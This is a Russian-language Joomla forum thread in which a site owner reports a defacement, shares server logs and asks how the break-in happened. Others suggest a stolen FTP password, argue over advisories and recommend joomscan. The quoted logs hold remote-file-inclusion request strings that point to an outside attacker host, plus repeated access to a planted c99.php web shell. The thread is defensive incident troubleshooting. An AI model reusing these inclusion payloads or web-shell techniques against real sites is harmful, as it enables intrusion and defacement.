Joomla 1.5 Сайт взломан, предположительно через mosConfig_absolute_path

Тема в разделе "Вопросы безопасности", создана пользователем Ingorabimus, 21.11.2009.

  1. Offline

    Ingorabimus Недавно здесь

    Регистрация:
    21.11.2009
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Женский
    Сайт взломан: установленно по красочной надписи на главной странице. Админ панель - доступна, но не действует пароль пользователя admin.

    Платформа: FreeBSD web04.nic.ru 6.4-RELEASE-p7 FreeBSD 6.4-RELEASE-p7 #7: Sun Oct 4 02:40:13 MSD 2009 root@hdad.nic.ru:/usr/obj/usr/src/sys/HNIC-SMP-ULE-IBM pl#12 i386
    Версия MySQL: 4.1.22
    Сравнение БД: utf8_general_ci
    Версия PHP: 5.2.10
    Вэб-сервер: Apache/1.3.37 (Unix) mod_gzip/1.3.26.1a mod_python/2.7.11 Python/2.6.2 PHP/5.2.10 mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 mod_fastcgi/2.4.2
    Интерфейс вэб-сервер -> PHP: apache
    Версия Joomla: Joomla! 1.5.15 Stable [ Wojmamni Ama Mamni ] 05-November-2009 04:00 GMT
    User Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.01

    Обнаружено в логах:
    212.227.114.130 - - [21/Nov/2009:00:41:52 +0300] "GET //joomla/index2.php?mosConfig_absolute_path=http://193.111.244.157/zzzz/www.my-site.ru/94 HTTP/1.1" 403 1351 "-" "-"
    212.227.114.130 - - [21/Nov/2009:00:41:52 +0300] "GET //joomla/index2.php?mosConfig_absolute_path=http%3A%2F%2F193.111.244.157%2Fzzzz%2Fwww.my-site.ru%2F94 HTTP/1.1" 403 1351 "-" "-"
    88.229.79.82 - - [21/Nov/2009:00:47:08 +0300] "GET /templates/beez/c99.php HTTP/1.1" 200 35986 "-" "Opera/9.80 (Windows NT 5.1; U; tr) Presto/2.2.15 Version/10.00"
    85.108.187.210 - - [21/Nov/2009:00:47:23 +0300] "GET /templates/beez/c99.php HTTP/1.1" 200 35986 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=home HTTP/1.1" 200 221 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=forward HTTP/1.1" 200 131 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=up HTTP/1.1" 200 211 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=back HTTP/1.1" 200 131 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=refresh HTTP/1.1" 200 212 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=buffer HTTP/1.1" 200 175 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=sort_asc HTTP/1.1" 200 97 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=search HTTP/1.1" 200 262 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:24 +0300] "GET /templates/beez/c99.php?act=img&img=ext_diz HTTP/1.1" 200 1039 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=ext_lnk HTTP/1.1" 200 584 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=small_dir HTTP/1.1" 200 176 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=ext_php HTTP/1.1" 200 91 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=change HTTP/1.1" 200 302 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
    85.108.187.210 - - [21/Nov/2009:00:47:25 +0300] "GET /templates/beez/c99.php?act=img&img=download HTTP/1.1" 200 173 "http://my-site.com/templates/beez/c99.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"[/QUOTE]

    Что сделано:
    1. Перезалиты файлы сайта
    2. Изменен пароль и логин администратору
    3. удален шаблон beez
    4. Проверены права на папки - все корректно

    На сайте используется компоненты:
    CustomQuickIcons 2.1.4 2009.03.30 mic / http://www.joomaax.com
    JCE 1.5.7 14 November 2009 Ryan Demmer
    JTags 1.5 Summer 2008 Jacek Zielinski
    Linkr
    OzioGallery 1.0.8 27/04/2008 Alexred
    QContacts 1.0.5 December 2008 Massimo Giagnoni
    QuiXplorer 1.0.1 July 17th, 2008 Philippe Borowek and The QuiX project
    sh404sef 1.0.16_Beta Jan 2, 2009 Yannick Gaultier
    Xmap

    Насколько я понимаю, сайт был взломан черз переменную mosConfig_absolute_path. Но в каком файле - не понятно.

    Прошу совет - Как определить место взлома? и Что можно сделать для предотвращения повторного взлома?
     
  2.  
  3. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Смотрите логи захода по ftp - кто и когда залил файл /templates/beez/c99.php
     
  4. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Насчет mosConfig_absolute_path - неверно думаете - ответ сервера 403 - то есть доступ запрещен
     
  5. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Скорее всего тупо украден пароль от ftp и залит shell - хотя нужно подробнее анализировать логи
     
  6. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Последняя Ёпера и Джумла ниже 1.5 14 уязвимы,
    Программа: Joomla! версии до 1.5.15

    Опасность: Низкая

    Наличие эксплоита: ДА

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к важным данным и изменить некоторые данные в приложении.

    1. Уязвимость существует из-за ошибки при обработке XML файлов. Удаленный пользователь может получить данные о версиях установленных модулей.

    2. Уязвимость существует из-за неизвестной ошибки в приложении, которая позволяет заменить статьи главной страницы другого пользователя.

    URL производителя: www.joomla.org

    Решение: Установите последнюю версию 1.5.15 с сайта производителя.

    URL адреса:

    * http://developer.joomla.org/security/news/306-20091103-core-xml-file-read-issue.html
    * http://developer.joomla.org/security/news/305-20091103-core-front-end-editor-issue-.html

    Программа: Opera версии 9.64 и 10.01, возможно другие версии.

    Опасность: Высокая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

    Уязвимость существует из-за ошибки при выделении пространства для чисел с плавающей запятой. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать повреждение памяти и выполнить произвольный код на целевой системе.

    URL производителя: www.opera.com

    Решение: Уязвимость устранена в релиз кандидате Opera RC3.
     
  7. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    А теперь смотри на ссылки
    1) Злоумышленник может узнать через XML версии установленных компонентов и подобрать к ним уязвимости (и? если компонент не имеет уязвимостей эта информация злоумышленнику не поможет)
    2) Пользователь с правами Автора может изменить статью написанную другим автором!
    1-ая это даже не уязвимость а страховка от уязвимостей сторонних компонентов
    2-ая это проблем, тем не менее не приводящая к доступу к админке.

    Далее, уязвимость в браузере может применяться для взлома компьютера пользователя, а не сервера, на сервере есть апачи, мускуль но никак не браузер.

    Asylum - большой минус за дезинформацию и попытки давать советы в областях, знаний в которых недостаточно!
     
  8. Offline

    ValeryB Активист

    Регистрация:
    07.10.2009
    Сообщения:
    384
    Симпатии:
    26
    Пол:
    Мужской
    Вообще-то проблемы взлома не рекомендуют обсуждать на форумах, так как информацией могут воспользоваться злоумышленники.
    Надо связываться напрямую с группой поддержки безопасности Joomla
     
  9. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Дезинормацию чего? О предупреждении что все версии 1.5 ниже 15 дырявы? Все подвержены дефейсу, ссылка Уязвимость существует из-за неизвестной ошибки в приложении, которая позволяет заменить статьи главной страницы другого пользователя.
    Хотя ошибка в самом деле известна на специализированных форумах, и поиск эксплоита, если знать где искать занимает пять кликов.
    Опера к джумла отношения не имеет, у многих это любимый браузер. А автоматическое обновление его бывает выключено
    Кто то его читает?
     
  10. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    И - по ссылке перевод того же что я и написал. Много сайтов у которых каждый зареганный автоматом получает права автора? Процента 2 наверно, не более, насчет XML - как я и сказал это не уязвимость а страховка от кривых компонентов. Каким боком тут приплетена Опера и вовсе не понятно.
    Тут все таки не желтая пресса бросаться словами и необоснованными заголовками
     
  11. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Секьюрити лаб давно страдает косноязычием,
    Поэтому данное нужно читать так: Уязвимость позволяющяя заменить главную страницу пока не описана в публичных ресурсах
     
  12. Offline

    _voland_ специалист

    Регистрация:
    12.04.2008
    Сообщения:
    2 173
    Симпатии:
    102
    Пол:
    Мужской
    Вообще то следует хоть раз прочитать источник - гугл транслейт в помощь и не пересказывать то что бабушка шепнула на скамейке.
     
  13. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Если б была ссылка на сайт, можно было что то сказать. Могу посоветовать joomscan только не забудь прикрутить свежую базу
     
  14. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 571
    Симпатии:
    152
    Пол:
    Мужской
    Вообще я и так читаю, без переводчиков
     

Поделиться этой страницей

Загрузка...